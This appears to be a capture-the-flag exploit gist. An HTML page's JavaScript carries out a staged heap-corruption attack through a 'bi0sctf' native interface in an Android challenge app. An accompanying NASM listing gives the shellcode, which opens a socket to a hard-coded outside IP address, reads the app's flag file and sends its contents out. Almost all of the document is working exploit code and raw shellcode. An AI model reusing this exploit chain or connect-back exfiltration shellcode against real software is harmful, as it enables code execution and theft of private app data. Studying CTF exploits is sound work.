<!DOCTYPE html> | |
<html lang="en"> | |
<head> | |
<meta charset="UTF-8"> | |
<meta name="viewport" content="width=device-width, initial-scale=1.0"> | |
<title>babu</title> | |
</head> | |
<body> | |
<p>bob</p> | |
<script>document.write("JS WORKS ? test")</script> | |
</body><script>console.log(1234)</script> | |
<script type="text/javascript"> | |
/**
 * Packs a non-negative integer into an 8-byte little-endian string, one
 * character per byte (char code 0..255). Bytes beyond what `data` needs stay 0.
 * Negative input yields eight NUL characters; only the low 8 bytes of very
 * large values are kept. Precision above 2**53 is whatever Number gives.
 * @param {number} data - value to pack
 * @returns {string} 8-character little-endian byte string
 */
function p64(data) {
  const bytes = new Uint8Array(8);
  let rest = data;
  for (let idx = 0; idx < bytes.length && rest > 0; idx += 1) {
    bytes[idx] = rest & 0xff;
    // Same arithmetic as floor-division by 256 for the non-negative case.
    rest = (rest - (rest % 256)) / 256;
  }
  return String.fromCharCode(...bytes);
}
/**
 * Turns a string into an array of numbers: one entry per iterated character,
 * taking that character's first UTF-16 code unit (charCodeAt(0)). Values can
 * exceed 255 for non-Latin-1 text; nothing is masked.
 * @param {string} data - input string (any iterable of strings also works)
 * @returns {number[]} code units in order; [] for an empty string
 */
function fin(data) {
  return Array.from(data, (ch) => ch.charCodeAt(0));
}
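/**
 * Reads a little-endian hex byte string (e.g. "efbeadde") as a number by
 * reversing the byte pairs and parsing the result as base-16.
 * An odd trailing nibble is dropped, as before. Values above 2**53 lose
 * precision because the result is a plain Number.
 * Fix: a string shorter than two characters used to throw a TypeError
 * (`match` returns null); it now yields NaN, matching parseInt on empty input.
 * @param {string} data - hex digits, two per byte, least significant byte first
 * @returns {number} parsed value, or NaN when no byte pair is present
 */
function u64(data) {
  const pairs = data.match(/../g);
  if (pairs === null) return NaN;
  return Number.parseInt(pairs.reverse().join(''), 16);
}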
// Sequence of calls against `bi0sctf`, an object that is NOT defined in this
// file; presumably exposed to the page by the embedding app — confirm. Every
// call passes the same `pass` string first. This block is not runnable outside
// that host and its statement order is what the author relies on.
pass = "50133tbd5mrt1769" // assigned without let/const: creates an implicit global
// Stage1 - Get the Heap address.
let h1 = bi0sctf.secure_talloc(pass, 0x20, fin(p64(0) + p64(0) + p64(0x31)))
let heap = h1-64 // assumes secure_talloc returns a numeric address — confirm
// stage2 - Get allocation on meta data at heap start. pointers.
let a = bi0sctf.secure_talloc(pass, 0x20, fin("BBBB"))
let b = bi0sctf.secure_talloc(pass, 0x90, fin("BBBB"))
console.log("Starting Exploit");
bi0sctf.secure_tree(pass, a)
bi0sctf.secure_tree(pass, heap+0x58)
bi0sctf.secure_talloc(pass, 0x20, fin(p64(0) + p64(0) + p64(0x41) + p64(heap+16)))
// intermediate step - later use.
console.log("reached intermidiate")
bi0sctf.secure_talloc(pass, 0x20, fin(p64(0) + p64(heap+0x28) + p64(0x80)))
console.log("Stage 3 - middle")
// stage3 middle step - setup
bi0sctf.secure_tree(pass, b)
let yello = bi0sctf.secure_talloc(pass, 0x80, fin(p64(0) + p64(0) + p64(0x30) + p64(0x41410008) + p64(0x41410008) + "XXXXXXXX" ))
bi0sctf.secure_tree(pass, heap+16)
bi0sctf.secure_talloc(pass, 0x20, fin(p64(yello+24) + p64(0)))
bi0sctf.secure_talloc(pass, 0x20, []) // the only call that bypasses fin() and passes an empty array directly
console.log("Stage - 3")
// stage3 - Overwrite the run debug to get the pointer to exec region.
bi0sctf.secure_tree(pass, heap+16)
bi0sctf.secure_talloc(pass, 0x20, fin(p64(0x41410008+16)))
// Raw machine-code bytes kept as a JS string; fin() turns them into a byte
// array on the next line. Appears to correspond to the NASM listing in the
// second file of this gist — confirm by assembling.
let shellcode = "\x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x31\xd2\x0f\x05\x49\x89\xc1\x6a\x2a\x58\x4c\x89\xcf\x52\x52\x68\x7a\xb2\x5d\x60\x66\x68\x05\x39\x66\x6a\x02\x48\x89\xe6\x48\x83\xc2\x10\x0f\x05\xb8\x02\x00\x00\x00\x41\xb8\x67\x00\x00\x00\x41\x50\x49\xb8\x65\x6e\x67\x65\x2f\x66\x6c\x61\x41\x50\x49\xb8\x69\x64\x2e\x63\x68\x61\x6c\x6c\x41\x50\x49\xb8\x74\x66\x2e\x61\x6e\x64\x72\x6f\x41\x50\x49\xb8\x74\x61\x2f\x62\x69\x30\x73\x63\x41\x50\x49\xb8\x2f\x64\x61\x74\x61\x2f\x64\x61\x41\x50\x48\x89\xe7\xbe\x00\x00\x00\x00\xba\x00\x00\x00\x00\x0f\x05\x48\x89\xc7\xb8\x00\x00\x00\x00\x48\x89\xe6\xba\x50\x00\x00\x00\x0f\x05\xb8\x01\x00\x00\x00\x4c\x89\xcf\x48\x89\xe6\xba\x50\x00\x00\x00\x0f\x05\x6a\x3c\x58\x0f\x05\x2f\x64\x61\x74\x61\x2f\x64\x61\x74\x61\x2f\x62\x69\x30\x73\x63\x74\x66\x2e\x61\x6e\x64\x72\x6f\x69\x64\x2e\x63\x68\x61\x6c\x6c\x65\x6e\x67\x65\x2f\x66\x6c\x61\x67"
let shell = bi0sctf.secure_talloc(pass, 0x100 , fin(shellcode)) // NOTE(review): `shell` is never read afterwards
console.log("Stage - 4")
// stage4 - overwrite the debugger with the address of shellcode
bi0sctf.secure_tree(pass, heap+16)
bi0sctf.secure_talloc(pass, 0x20, fin(p64(0) + p64(0) + p64(0) +p64(0x41410018)))
console.log("Stage - 5")
// call the shellcode
bi0sctf.secure_talloc(pass, 0x20, fin(p64(69)))
</script> | |
</body> | |
</html> |
; NASM x86-64 listing. Each label names the Linux syscall its section issues
; (rax set by push/pop or mov, then `syscall`). It appears to be the source of
; the `shellcode` byte string in the HTML file of this gist — confirm by
; assembling. r9 carries the socket descriptor between sections.
global _start
section .text
_start:
socket:
push 0x29          ; rax = 0x29 (socket)
pop rax
push 0x02          ; rdi = 2
pop rdi
push 0x01          ; rsi = 1
pop rsi
xor edx, edx       ; rdx = 0
syscall
mov r9, rax        ; keep the returned socket fd; used by connect: and write:
connect:
push 0x2a          ; rax = 0x2a (connect)
pop rax
mov rdi, r9
; creating sockaddr data structure
push rdx ; pushing padding
push rdx
; NOTE(review): 0x41414141 is not INADDR_ANY (which is 0.0.0.0); this is a
; filler value, and the HTML file's byte string carries a different value here.
push 0x41414141 ; pushing INADDR_ANY
push word 0x3905 ; pushing PORT
push word 0x0002 ; pushing AF_INET
mov rsi, rsp       ; rsi -> the structure just built on the stack
add rdx, 0x10      ; rdx = 16 (length of the structure)
syscall
open:
mov rax, 2         ; rax = 2 (open)
; The path string is assembled on the stack by the six pushes below; the
; `path:` data at the end of the file is never referenced by any instruction.
mov r8, 0x0000000000000067
push r8
mov r8, 0x616c662f65676e65
push r8
mov r8, 0x6c6c6168632e6469
push r8
mov r8, 0x6f72646e612e6674
push r8
mov r8, 0x63733069622f6174
push r8
mov r8, 0x61642f617461642f
push r8
mov rdi, rsp       ; rdi -> path on the stack
mov rsi, 0         ; flags = 0 (O_RDONLY)
mov rdx, 0         ; mode = 0
syscall
read:
mov rdi, rax       ; fd returned by open
mov rax, 0         ; rax = 0 (read)
mov rsi, rsp       ; read into the stack buffer, overwriting the path bytes
mov rdx, 0x50      ; fixed 0x50-byte read
syscall
write:
mov rax, 0x1       ; rax = 1 (write)
mov rdi, r9        ; socket fd saved earlier
mov rsi, rsp
mov rdx, 0x50      ; always 0x50 bytes, regardless of how many read returned
syscall
finish:
push 0x3c          ; rax = 0x3c (exit)
pop rax
syscall
path: db "/data/data/bi0sctf.android.challenge/flag", 0